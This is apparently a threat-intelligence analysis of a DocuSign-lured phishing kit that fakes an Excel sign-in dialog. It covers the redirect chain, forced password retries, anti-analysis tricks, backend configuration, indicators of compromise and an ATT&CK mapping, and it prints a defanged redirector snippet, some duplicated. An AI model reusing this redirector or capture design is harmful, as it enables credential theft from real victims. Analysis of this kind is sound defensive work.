Excel Shared Document Phishing Kit

Excel Shared Document Phishing Kit

Analysis

9 MIN READ

TL;DR

This campaign delivers a high-quality phishing page that impersonates a Microsoft Excel shared-document access dialog. The full infection chain is:

  1. Victim (primarily business-affiliated) receives a DocuSign-branded email claiming business files are ready for review.

  2. The call-to-action button is tracked via Monday.com and lands on an intermediate page hosted at atecevents.com.hk.

  3. The intermediate page extracts a base64-encoded email address from the URL fragment, then redirects to a Cloudflare Workers domain that uses the same campaign identifier seen in the final kit.

  4. The final page presents a convincing Excel / Office modal, pre-fills the email when available, forces up to three password attempts with realistic error messages, and exfiltrates credentials to a relative /api/capture-creds endpoint.

  5. After the final attempt it shows a fake success screen and redirects the victim. Extensive anti-devtools code is present, and the page is designed for a commercial-style phishing platform whose backend runs on Supabase.

The combination of a trusted brand in the email, clean intermediate redirects, high visual fidelity, deliberate retry logic, and strong client-side protection makes the kit more effective than many crude one-off pages sent to the spam-fill.

Infection Chain



Stage 1 – DocuSign Email

A representative sample observed on 21 August 2026:

Field

Observed Value

Notes

Subject

Review: (1) Electronic Signature with DocuSign

—

From

DocuSign <t.vasylynchuk@brushme.com.ua>

Spoofed display name; real domain is unrelated

Call-to-action

Large yellow button: VIEW COMPLETED DOCUMENT

Primary click target

Body text

“You have recieved some business files on DocuSign.”

Spelling error (“recieved”)

Key red flags

  • The true sending domain (brushme.com.ua) has no relationship to DocuSign.

  • Legitimate DocuSign notifications originate from @docusign.com or @docusign.net and normally name the specific document and sender.

  • Basic spelling mistakes are uncommon in official product emails.

  • Language is deliberately vague (“some business files”, “completed document”) so the same template can be reused across many recipients.

Stage 2 – Tracking & Intermediate Redirect

The button in the email points to a Monday.com tracking URL of the form:

After the tracking hop the victim is sent to:

The page at this location is a minimal HTML/JavaScript redirector. Its sole purpose is to extract the base64-encoded email address from the URL fragment and forward the victim to the next stage while preserving that email, without the needed email address, it fails and doesn't continue.

Relevant logic (simplified):

var url_string = window.location.href;
var url_get_email = atob(getafterhash(url_string));
var mail_go_url = "hxxps://accounts-2043391f.faytriecu04n.workers[.]dev/2043391f72954820#" + url_get_email;
location.replace(mail_go_url);

function getafterhash(url) {
  // Attempts to extract the value after #?docsign= (with several fallbacks)
  // ...
}
var url_string = window.location.href;
var url_get_email = atob(getafterhash(url_string));
var mail_go_url = "hxxps://accounts-2043391f.faytriecu04n.workers[.]dev/2043391f72954820#" + url_get_email;
location.replace(mail_go_url);

function getafterhash(url) {
  // Attempts to extract the value after #?docsign= (with several fallbacks)
  // ...
}

The path component 2043391f72954820 and the subdomain prefix accounts-2043391f both contain the campaign identifier 2043391f. This same identifier appears later as the PID value inside the final phishing page, confirming that all stages belong to the same operation rather than distributed.

Stage 3 – Final Phishing Page

The victim ultimately lands on the Excel / Office shared-document page (or a closely related variant hosted under the Workers domain). This is the page analysed in detail below.

Landing Page – Visual Impersonation

The final page presents a full-screen background image with a centred modal that closely mimics a Windows / Office window:

  • Fake title bar using the four Microsoft logo colours and the word “Office”

  • Large green “Excel” heading that matches official Excel branding

  • Email and password fields with matching green borders

  • “Keep me signed in” checkbox (pre-checked)

  • Primary action button labelled Download

  • Loading spinner followed by a success state with a checkmark icon

The favicon is an inline SVG of a green rounded square containing a white “X”. The page also sets robots meta tags to discourage indexing and disables pinch-to-zoom on mobile.

At a glance the interface is credible, especially for users who regularly receive legitimate shared-document notifications from Microsoft 365 or OneDrive.

Credential Capture Flow

The core capture logic lives in a self-contained script:

  1. On load the script attempts to extract and decode an email address from the URL (cid, info, or hash) and pre-fills the email field.

  2. It also injects two long random query parameters (sid and rid) via history.replaceState. These appear to serve tracking or session-correlation purposes.

  3. When the user clicks Download, basic validation is performed (email must contain @, password must not be empty).

  4. Credentials are serialised as JSON and sent to location.origin + "/api/capture-creds" using fetch, with a retry and a navigator.sendBeacon fallback.

  5. A configurable retry counter (default 3) is enforced. On intermediate attempts the password field is cleared and a realistic Microsoft-style error is displayed:

    The account or password you entered is incorrect. Please try again.


  6. After the final attempt the form is replaced by a loader, then a success screen, and the browser is redirected (to a configured finalUrl, the victim’s email domain, or the current origin).

This multi-attempt design is deliberate: many users will re-type their password when they see a familiar error message, giving the attacker a higher chance of obtaining the correct credential.

Anti-Analysis Measures

A large defensive script actively hinders both human analysts and automated tools:

  • Right-click, text selection (outside inputs), copy, cut and drag are blocked

  • Common developer shortcuts (F12, Ctrl+Shift+I/J/C, Ctrl+U, Ctrl+S, Ctrl+P, etc.) are intercepted

  • Window size is polled; if the difference between outer and inner dimensions suggests DevTools is open, the entire page is replaced with an “Access Denied” message

  • The console object is overridden so logging methods become no-ops

  • Printing is blocked via CSS and the beforeprint event

  • Iframe breakout is attempted

  • The view-source: protocol is detected and the page is blanked

  • Aggressive CSS forces user-select: none and disables image dragging

These techniques are characteristic of commercial phishing kits that try to raise the cost of analysis.

Campaign Backend

Near the bottom of the final page a set of global configuration variables reveal the supporting infrastructure:

BACKEND = "hxxps://qctazjekftdaugwaxwyc.supabase[.]co/functions/v1/landing-pages-api"
AKEY   = "sb_publishable_WuERWAB_ViDmX4RU-w_xpQ_CBVW_Kq2"
PID    = "2043391f-7295-4820-8fb2-d67444891798"
UID    = "0fd65e2f-dc49-47ea-8cff-fa6d12f7d51c"
BACKEND = "hxxps://qctazjekftdaugwaxwyc.supabase[.]co/functions/v1/landing-pages-api"
AKEY   = "sb_publishable_WuERWAB_ViDmX4RU-w_xpQ_CBVW_Kq2"
PID    = "2043391f-7295-4820-8fb2-d67444891798"
UID    = "0fd65e2f-dc49-47ea-8cff-fa6d12f7d51c"

A geo-IP language detection call is made to the same Supabase Edge Function so the form text can be localised (support exists for Chinese, French, German, Spanish, Portuguese, Japanese, Korean, Arabic and others). Additional flags for cookie capture, MFA capture and token handling are present but disabled in the examined sample.

The primary credential sink remains the relative /api/capture-creds endpoint hosted on the phishing domain itself; the Supabase project appears to handle campaign management, telemetry and localisation.

The repeated appearance of the identifier 2043391f across the intermediate redirect, the Workers subdomain, and the final-page PID value ties the entire chain together.

Indicators of Compromise

Domains & Hosts

  • brushme.com.ua (email sending domain)

  • trackingservice.monday.com (tracking hop)

  • atecevents.com.hk (intermediate redirector)

  • accounts-2043391f.faytriecu04n.workers.dev (Cloudflare Workers stage)

  • qctazjekftdaugwaxwyc.supabase.co (campaign backend)

Notable Paths & Endpoints

  • /ter/ on atecevents.com.hk

  • /2043391f72954820 on the Workers domain

  • Relative endpoint /api/capture-creds (credential collection)

Strings & Selectors

  • CSS classes: eg-overlay, eg-modal, eg-titlebar, eg-excel-title

  • JavaScript identifiers: window.__WEBAPP_CFG, sendCapture, autoGrab, injectParams

  • Marker comment: WEBAPP_SELF_CONTAINED

  • Configuration keys: LOADER_PRESET, SUITE_TYPE = "webapp"

  • Publishable key prefix beginning sb_publishable_WuERWAB_...

Campaign Identifiers



Behavioural Indicators

  • Injection of long random sid + rid query parameters on page load

  • Password form that forces multiple submission attempts while displaying the exact error string quoted above

  • POST of JSON objects containing email, password and attempt fields

  • Continuous outer/inner window-size polling that blanks the page when DevTools is detected

  • Intermediate page that performs atob() on a URL fragment and immediately redirects

MITRE ATT&CK Mapping

Tactic

Technique

ID

Observation

Initial Access

Phishing

T1566

DocuSign-themed email lure

Initial Access

Spearphishing Link

T1566.002

Link carries pre-filled (base64) email parameter

Credential Access

Input Capture

T1056

Form-based harvesting of email + password

Defense Evasion

Obfuscated Files or Information

T1027

Heavy client-side anti-analysis code

Defense Evasion

Indicator Removal

T1070

DevTools detection + page blanking

Collection

Data from Information Repositories

T1213

Credentials collected from the login form

Command and Control

Web Service

T1102

Supabase Edge Function + relative capture API

Command and Control

Proxy

T1090

Intermediate redirector + tracking service